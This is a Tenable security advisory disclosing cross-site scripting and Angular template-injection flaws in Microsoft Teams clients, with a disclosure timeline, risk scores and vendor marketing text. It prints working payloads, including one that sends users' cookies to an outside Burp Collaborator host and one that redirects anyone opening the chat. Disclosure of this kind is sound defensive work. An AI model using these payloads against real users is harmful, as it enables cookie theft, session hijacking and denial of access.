Facebook Google Plus Twitter LinkedIn YouTube RSS Menu Search Resource - BlogResource - WebinarResource - ReportResource - Eventicons_066 icons_067icons_068icons_069icons_070

Microsoft Teams Multiple Vulnerabilities

Medium

Synopsis

XSS :
A cross-site scripting (XSS) vulnerability exists in the contentUrl parameter of https://teams.microsoft.com/statics/teams-modular-packages/hosted-web-content/20190320025/index.html.

This can be leveraged to trigger an XSS attack against users of the Microsoft Teams web and desktop applications (either directly as a link, or when stored as a Website Tab. (open a team chat, add a new tab, add a Website tab with the following payload)

Payload:
https://teams.microsoft.com/statics/teams-modular-packages/hosted-web-content/20190320025/index.html?contentUrl=javascript:alert(document.domain.concat(%27\n%27).concat(document.cookie))

Client Side Template Injection in Praise Cards in Microsoft Teams

The web request sent when sending a Praise card in the Microsoft Teams chats/conversations can be tampered with, and renders the Microsoft Teams application vulnerable to a client-side template injection vulnerability in its Angular component.
The praise card feature appears to be included in Teams by default.

The parameters of the adaptive card being created when sending a Praise card in Microsoft Teams can be tampered with to alter their values. The vulnerable parameter is sent as part of a larger stringified json object as part of the properties.cards parameter, so ignoring the stringification of properties.cards, the vulnerable entry would be properties.cards[0].content.body[0].altText.

The expression has access to the application’s root scope, and as a result can access a wide variety of information about a potential affected user, in addition to being able to directly alter the content and settings of that user’s current Microsoft Teams application.

Payload:

{{22*22}} 

While Angular limits what a user can and cannot call via expressions (e.g. functions like Window.open() cannot be called, and DOM elements cannot be changed directly via document objects) the root scope grants access to a large number of objects, functions, and application settings which can be abused to achieve greater effect.

Payload:

 {{$root.$$childHead.$$nextSibling.app.ariaLiveService.assertive.outerHTML=\\\"<iframe src='https://teams.microsoft.com/statics/teams-modular-packages/hosted-web-content/20190320025/index.html?contentUrl=javascript:alert(document.domain.concat(document.cookie))'></iframe>\\\"}}

 

Even without the previously discussed XSS, an <img> tag can still be used to exfiltrate data by setting the image source to an attackers server, which listens for requests containing user data. Any user with the chat open, or who opens it while the message is still active, would be affected. (Image below shows the http request generated by the payload)

Payload:

 {{$root.$$childHead.$$nextSibling.app.ariaLiveService.assertive.outerHTML=\\\"<img src='https://dzg2zww47talp8rfx6tdkdm52w8rwg.burpcollaborator.net/derp.jpg?\\\".concat($root.$$childHead.$$nextSibling.app.ariaLiveService.assertive.ownerDocument.cookie).concat(\\\"'></img>\\\")}}

 

The last payload to mention is one which simply redirects any user who opens the chat, or has the chat open, to another web page entirely. This is worth mentioning since this effectively denies access to that chat room until the malicious message can be deleted (which is difficult, given the redirect occurs almost immediately). The image below shows that the main windows of the desktop application has successfully been redirected.

Payload:

 {{$root.$$childHead.$$nextSibling.app.$window.location.replace('https://www.tenable.com/research')}}

 

Solution

Upgrade to the latest version of the Microsoft Teams client. The issues also appear to be patched in the web client. Microsoft has not issued official advisories for these issues.

Disclosure Timeline

September 27, 2019 - Tenable discloses to MSRC.
September 27, 2019 - MSRC acknowledges report.
October 8, 2019 - MSRC sends another acknowledgement.
October 8, 2019 - Tenable requests status update.
October 11, 2019 - MSRC claims they are unable to reproduce. Investigating to see if issues were fixed internally.
October 14, 2019 - Tenable follows up.
October 15, 2019 - MSRC acknowledges followup.
October 17, 2019 - Tenable requests status update. Confirms XSS still in production releases.
October 18, 2019 - MSRC states no updates available.
October 28, 2019 - Tenable requests status update.
October 28, 2019 - MSRC claims they are unable to reproduce.
October 30, 2019 - Tenable provides clarification.
November 14, 2019 - Tenable requests status update.
December 2, 2019 - Tenable requests status update.
December 3, 2019 - MSRC states they cannot reproduce.
December 3, 2019 - Tenable provides clarification.
December 5, 2019 - MSRC acknowledges clarification.
December 16, 2019 - Tenable requests status update and reminds MSRC of approaching deadline.

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]

Risk Information

Tenable Advisory ID: TRA-2019-54
Credit:
Evan Grant of Tenable Research
CVSSv2 Base / Temporal Score:
6.8 / 5.3
CVSSv2 Vector:
AV:N/AC:M/Au:N/C:P/I:P/A:P
Affected Products:
Microsoft Teams Windows Clients 1.2.00.24753, teams.microsoft.com web client (unknown version)
Risk Factor:
Medium

Advisory Timeline

December 26, 2019 - Initial release.
December 26, 2019 - Corrected images.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose Your Subscription Option:

Buy Now

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose Your Subscription Option:

Buy Now

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose Your Subscription Option:

Buy Now

Try Tenable Web App Scanning

Enjoy full access to our latest web application scanning offering designed for modern applications as part of the Tenable One Exposure Management platform. Safely scan your entire online portfolio for vulnerabilities with a high degree of accuracy without heavy manual effort or disruption to critical web applications. Sign up now.

Your Tenable Web App Scanning trial also includes Tenable Vulnerability Management and Tenable Lumin.

Buy Tenable Web App Scanning

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

5 FQDNs

$3,578

Buy Now

Try Tenable Lumin

Visualize and explore your exposure management, track risk reduction over time and benchmark against your peers with Tenable Lumin.

Your Tenable Lumin trial also includes Tenable Vulnerability Management and Tenable Web App Scanning.

Buy Tenable Lumin

Contact a Sales Representative to see how Tenable Lumin can help you gain insight across your entire organization and manage cyber risk.

Try Tenable Nessus Professional Free

FREE FOR 7 DAYS

Tenable Nessus is the most comprehensive vulnerability scanner on the market today.

NEW - Tenable Nessus Expert
Now Available

Nessus Expert adds even more features, including external attack surface scanning, and the ability to add domains and scan cloud infrastructure. Click here to Try Nessus Expert.

Fill out the form below to continue with a Nessus Pro Trial.

Buy Tenable Nessus Professional

Tenable Nessus is the most comprehensive vulnerability scanner on the market today. Tenable Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy a multi-year license and save. Add Advanced Support for access to phone, community and chat support 24 hours a day, 365 days a year.

Select Your License

Buy a multi-year license and save.

Add Support and Training

Try Tenable Nessus Expert Free

FREE FOR 7 DAYS

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

Already have Tenable Nessus Professional?
Upgrade to Nessus Expert free for 7 days.

Buy Tenable Nessus Expert

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

Select Your License

Buy a multi-year license and save more.

Add Support and Training